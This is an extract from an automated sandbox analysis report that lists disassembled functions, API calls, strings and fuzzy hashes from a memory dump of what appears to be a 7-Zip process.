                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51b87b423445c07e3ff9f805dcea364fc8add8783b730053b3f1e0467506e147
                              • Instruction ID: a1fbbcb9bcc7efee7b688c0ae804cdaa06d370458df0ffd6cbcb206c86ad0655
                              • Opcode Fuzzy Hash: 51b87b423445c07e3ff9f805dcea364fc8add8783b730053b3f1e0467506e147
                              • Instruction Fuzzy Hash: CC4177A3B2097013EB2C9D1A9C24B745543B7C8B94F5AD239AE274F789E97D8C01D381
                              Function 00F8DF78 Relevance: .1, Instructions: 135COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a1e193211b1377197a9ffed0db1a3082c11c6598efc29a2749b5744c5b9d6266
                              • Instruction ID: 19e2a37985548ef290cb2f4b100a4fb18c0ea90ca722389ce595a07d089e609f
                              • Opcode Fuzzy Hash: a1e193211b1377197a9ffed0db1a3082c11c6598efc29a2749b5744c5b9d6266
                              • Instruction Fuzzy Hash: 84311390AF14F0038B1C1AAECCB73B3200217902251FC842EB30385FC0DD1CC801260C
                              Function 00FCDD60 Relevance: .1, Instructions: 93COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9bf3d84cf31aa177eb5d0cb971182c19ef539d475a2d73d801f53471c03aa189
                              • Instruction ID: 0c1aa72de3fd69b90d94e583192a8cc5b6c099de0413a15664c381042be4dc76
                              • Opcode Fuzzy Hash: 9bf3d84cf31aa177eb5d0cb971182c19ef539d475a2d73d801f53471c03aa189
                              • Instruction Fuzzy Hash: DF314D37760A0747D78CCA29DC73B7D32E1E389205F849A3EEA5ACA6C1E7388415C340
                              Function 00F8DCAC Relevance: .1, Instructions: 90COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2cd27a4dda1deeeaf334fe34166b18873a0706cf160d75d765b7e8183f0e3f57
                              • Instruction ID: 5e52faa9fd702dda3fc015166fe922b50f0fa0ed30bbca94bd09a3a904d6698f
                              • Opcode Fuzzy Hash: 2cd27a4dda1deeeaf334fe34166b18873a0706cf160d75d765b7e8183f0e3f57
                              • Instruction Fuzzy Hash: 78214927B41A0817EF1E8A39A811BE917809F98B84F495038AD0ED3BC8E9B8CD47C300
                              Function 00FCE4D1 Relevance: .1, Instructions: 70COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 05d75bd9e6c7a1b6fb157d21d0ebc0644388d6d38c98960a44e8038350d5c7f1
                              • Instruction ID: a1d200357ffbb5846ee61c0b5910d5c999a4746cf6d8f58547e11c2aceb8309a
                              • Opcode Fuzzy Hash: 05d75bd9e6c7a1b6fb157d21d0ebc0644388d6d38c98960a44e8038350d5c7f1
                              • Instruction Fuzzy Hash: 872126B3E106604BC7068E3DE788BEAB392F7047FEF064B26DF55639D8D218A454D250
                              Function 00FCE5C0 Relevance: .1, Instructions: 69COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3590c6d0bcf59f41b6e76912e67f45de8633cf2801e00cea3d94b070f5cd6fe1
                              • Instruction ID: 6f1345dde3f8972bbcdc1bcec83e3625def35a2d57d2794b52bdc5ab9a17af05
                              • Opcode Fuzzy Hash: 3590c6d0bcf59f41b6e76912e67f45de8633cf2801e00cea3d94b070f5cd6fe1
                              • Instruction Fuzzy Hash: E42135F3A304608AC306CF39EB89BB663A1FB187FDF4687258F52579C8D6189444E700
                              Function 00FCE460 Relevance: .0, Instructions: 20COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2716c4ae18f5ff5d555640cd6024ddbdb25aea7ac000581464c462b0bdaade77
                              • Instruction ID: 6bb008cabd4ff35594abe3f0f973675e9fe118e9ce1bc83eee498c225c489b31
                              • Opcode Fuzzy Hash: 2716c4ae18f5ff5d555640cd6024ddbdb25aea7ac000581464c462b0bdaade77
                              • Instruction Fuzzy Hash: 65D01275BA900383EB8C313C290376911C14398325FA88A9DEC1EC6751D15DCEF29408
                              Function 00F98ECC Relevance: 128.0, APIs: 102, Instructions: 474COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ErrorLast
                              • String ID:
                              • API String ID: 408039514-0
                              • Opcode ID: 606528062de862ecd2e5ad603e6f1674b931153cadb5dc82d0d34aaa2013ffa8
                              • Instruction ID: 50c379e291718705907c79f6c0d87cc65179c0629ff06fe365ae7d352d66924e
                              • Opcode Fuzzy Hash: 606528062de862ecd2e5ad603e6f1674b931153cadb5dc82d0d34aaa2013ffa8
                              • Instruction Fuzzy Hash: 4A02F82225968981DFE0FB35EC5176FB320F7C1780F405017EA8E97A29DE6DC852EB52
                              Function 00F882C8 Relevance: 64.8, APIs: 35, Strings: 8, Instructions: 291COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • Cannot create hard link, xrefs: 00F88451
                              • Dangerous link path was ignored, xrefs: 00F88377
                              • Dangerous symbolic link path was ignored, xrefs: 00F884D6
                              • Cannot create symbolic link, xrefs: 00F88660
                              • Incorrect path, xrefs: 00F883D4
                              • Internal error for symbolic link file, xrefs: 00F885A8
                              • Cannot fill link data, xrefs: 00F8852A
                              • Empty link, xrefs: 00F88406
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: Cannot create hard link$Cannot create symbolic link$Cannot fill link data$Dangerous link path was ignored$Dangerous symbolic link path was ignored$Empty link$Incorrect path$Internal error for symbolic link file
                              • API String ID: 1294909896-553938736
                              • Opcode ID: af50df62797d8402ac558955d229e3593c8d56c8c66c2bf677da475acf059cb7
                              • Instruction ID: 58c4f08dcc913d31aa8b73aeaa963d3abd6c1a7c53950bbd965dee5a7f81327f
                              • Opcode Fuzzy Hash: af50df62797d8402ac558955d229e3593c8d56c8c66c2bf677da475acf059cb7
                              • Instruction Fuzzy Hash: 37B1842225868591CB90FF31EC516AE7720F7C5B90F849023FB8E97629DE3DC856E741
                              Function 00F84A54 Relevance: 40.7, APIs: 25, Strings: 2, Instructions: 211COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$ExceptionThrow
                              • String ID: incorrect update switch command$pqrxyzw
                              • API String ID: 3957182552-3922825594
                              • Opcode ID: 41b23f4014f6085aaf6cdefc9d6df0997c1b3c2b5bdd1975e5dc9d171f647215
                              • Instruction ID: aa7f93e5d2c3c313226575c6565f12440c65d2c898aed16c8cbe4396b7560bff
                              • Opcode Fuzzy Hash: 41b23f4014f6085aaf6cdefc9d6df0997c1b3c2b5bdd1975e5dc9d171f647215
                              • Instruction Fuzzy Hash: 7181C533214A8692CBA0FF15D8517AE7324F7C5B84F808123EA8E4BA64DF3CC946E751
                              Function 00F9A43C Relevance: 40.4, APIs: 32, Instructions: 434COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$ExceptionThrow$malloc
                              • String ID:
                              • API String ID: 3260709843-0
                              • Opcode ID: 50072fc7dc4e71bb0901f73cb9092738f880ee15fc145bdba844f487ca264e0b
                              • Instruction ID: 49877f7c74207a086ca4dff9d016213043730465db7e609ecf3c60d6de925e59
                              • Opcode Fuzzy Hash: 50072fc7dc4e71bb0901f73cb9092738f880ee15fc145bdba844f487ca264e0b
                              • Instruction Fuzzy Hash: 7DE1F433A0868186DF60EE15E8402ADB760F3C6BE0F594126EF9D1B715DE3DC846E782
                              Function 00F7B298 Relevance: 37.8, APIs: 22, Strings: 3, Instructions: 338COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID: \$\\?\$\\?\UNC\
                              • API String ID: 0-1962706685
                              • Opcode ID: 267a6c0012ce0b90dfc5c23c265d19d6db197da694bdbae4b4e6e3e236625512
                              • Instruction ID: e16e3c222f94928ebc37cd6df679bf4b14a4be05770b65efd028328babc78266
                              • Opcode Fuzzy Hash: 267a6c0012ce0b90dfc5c23c265d19d6db197da694bdbae4b4e6e3e236625512
                              • Instruction Fuzzy Hash: E1C1AF2260864590CF60EB21D85176E7B21EBC37D4F84D013EA4E8766ADF6DC68AF713
                              Function 00F764DC Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 351COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$wcscmp$ExceptionThrowmemmove
                              • String ID: Empty file path
                              • API String ID: 3919112945-1562447899
                              • Opcode ID: 4cfa43fdf7aadb241ea66799b74f1c086add33526c741a8ff133164f6a191e78
                              • Instruction ID: cd054929539324735f9b1cb555904fed7708dfd20e297f837e9732d32d1ca964
                              • Opcode Fuzzy Hash: 4cfa43fdf7aadb241ea66799b74f1c086add33526c741a8ff133164f6a191e78
                              • Instruction Fuzzy Hash: 2AD1E336604A8586CB20DF15E84036EBB61F784B94F44C127EE8E5BB19DF3DC955EB02
                              Function 00FC7EC8 Relevance: 31.4, APIs: 25, Instructions: 159COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: f1ac6982316865ef78115947ac071b5bc853db16aa935c33ea20d6eeb25a1a84
                              • Instruction ID: 120fa4846e89935f3bf1cf6e3f2cc89fc8e171e69fa1c6993861dcd4c0d48c13
                              • Opcode Fuzzy Hash: f1ac6982316865ef78115947ac071b5bc853db16aa935c33ea20d6eeb25a1a84
                              • Instruction Fuzzy Hash: 84515F27A10B8985C7A1FE31D95266D3321FB95FE8F5C813AEE1D1F719DE29C8129320
                              Function 00F71E58 Relevance: 29.0, APIs: 23, Instructions: 296COMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F71E9F
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F71EC3
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 22be68ce6d10f8936171442d49f81555044f1582d9851aba0b7553b2ee80a743
                              • Instruction ID: b27fef9011ba4e58850be17774d05b4b50fca25156190e7031e020af6c5c992c
                              • Opcode Fuzzy Hash: 22be68ce6d10f8936171442d49f81555044f1582d9851aba0b7553b2ee80a743
                              • Instruction Fuzzy Hash: 48A1F52360868581CBB0EF25E84026EB721F7D57A0F94C113EBCE47A59DF6DC946EB12
                              Function 00F9A000 Relevance: 29.0, APIs: 23, Instructions: 213COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ErrorLastmemmove
                              • String ID:
                              • API String ID: 3561842085-0
                              • Opcode ID: c7de1312469f12b58a544419150d20ceaeec8a7107733208b76bd11ca0581b8d
                              • Instruction ID: 7529391ea61792ef74ee605fc5e1180dfeb2757ed6beea88975705c23d7934b8
                              • Opcode Fuzzy Hash: c7de1312469f12b58a544419150d20ceaeec8a7107733208b76bd11ca0581b8d
                              • Instruction Fuzzy Hash: 9071C422604A8591DFA0EB25EC4179EB720E7C17E0F445123EF9D4BB69DF2DC846DB42
                              Function 00F8D0C0 Relevance: 28.8, APIs: 18, Strings: 1, Instructions: 300COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: \\?\
                              • API String ID: 1294909896-4282027825
                              • Opcode ID: acd9ec8d22e027280a474f9c43cee375eb4e5258065a7589dca74085d4ab26d4
                              • Instruction ID: 9b46c536aa0ca7de96e7120282a0cd0741a44f382d5fb967cbfea9cc7196f16d
                              • Opcode Fuzzy Hash: acd9ec8d22e027280a474f9c43cee375eb4e5258065a7589dca74085d4ab26d4
                              • Instruction Fuzzy Hash: 1DC19C32205B4592CB54EF25E8907AD7760FBC5B94F444122EB8E8BBA4DF3DC856E701
                              Function 00FC6E78 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 160COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$fputc
                              • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                              • API String ID: 2662072562-1527772849
                              • Opcode ID: 92ac762957fcb0b0e0c66e992c5dcbb18189989fa4a3062d3011af6b5088c3dd
                              • Instruction ID: 2d2fd7c68d7f7d4d041a0ddde488ebd887469270c0f5f264808f147b5c27ff1f
                              • Opcode Fuzzy Hash: 92ac762957fcb0b0e0c66e992c5dcbb18189989fa4a3062d3011af6b5088c3dd
                              • Instruction Fuzzy Hash: E551B43260864282CA74FB25EB9577E7322F784BE4F40812BEE4E43A55DF2CC585E702
                              Function 00F898F0 Relevance: 25.2, APIs: 20, Instructions: 170COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 6324547189e8b2bcaad28c273deeb380217af71a168f8b56e1851644d94c6114
                              • Instruction ID: f147d6fdd2476aad3df75da1b096865e7da0791bffc15ad4b3bd1f1cbb2851fa
                              • Opcode Fuzzy Hash: 6324547189e8b2bcaad28c273deeb380217af71a168f8b56e1851644d94c6114
                              • Instruction Fuzzy Hash: 22513926706B8885CB95EF32C8956AD7320FB82FA5F5C4136DE1E1F718CF69C8059321
                              Function 00FBD810 Relevance: 24.4, APIs: 12, Strings: 4, Instructions: 361COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ClearVariant
                              • String ID: 2$?$?$Z
                              • API String ID: 1677346816-1743634682
                              • Opcode ID: a78526e38cb49b708f68608ae898e3687e87b602a16de861b12778e0e2767a4b
                              • Instruction ID: 76c55f833525a7e4539b5f6ac5f93d3887c2b0890a838a74475957acba14898e
                              • Opcode Fuzzy Hash: a78526e38cb49b708f68608ae898e3687e87b602a16de861b12778e0e2767a4b
                              • Instruction Fuzzy Hash: 6CD1D63361458492CA70EB26D8906EE7721F7C5794F418223E68E87B79EF2DC945EF02
                              Function 00FC7558 Relevance: 23.8, APIs: 19, Instructions: 79COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 7b9701e2983c76c0a1a72bf315f80d4a189fe68506923e36d5f0ecddaa314cc9
                              • Instruction ID: 373295dd4714d12b1b902d1799b36c5aa5609abd1cb6f51db81460613ea90576
                              • Opcode Fuzzy Hash: 7b9701e2983c76c0a1a72bf315f80d4a189fe68506923e36d5f0ecddaa314cc9
                              • Instruction Fuzzy Hash: 8631FE22611A4A81CB91FF36CD522AC7320EBC5F94F4881379E1D5F356CE29CC52A361
                              Function 00F777B4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 131threadCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
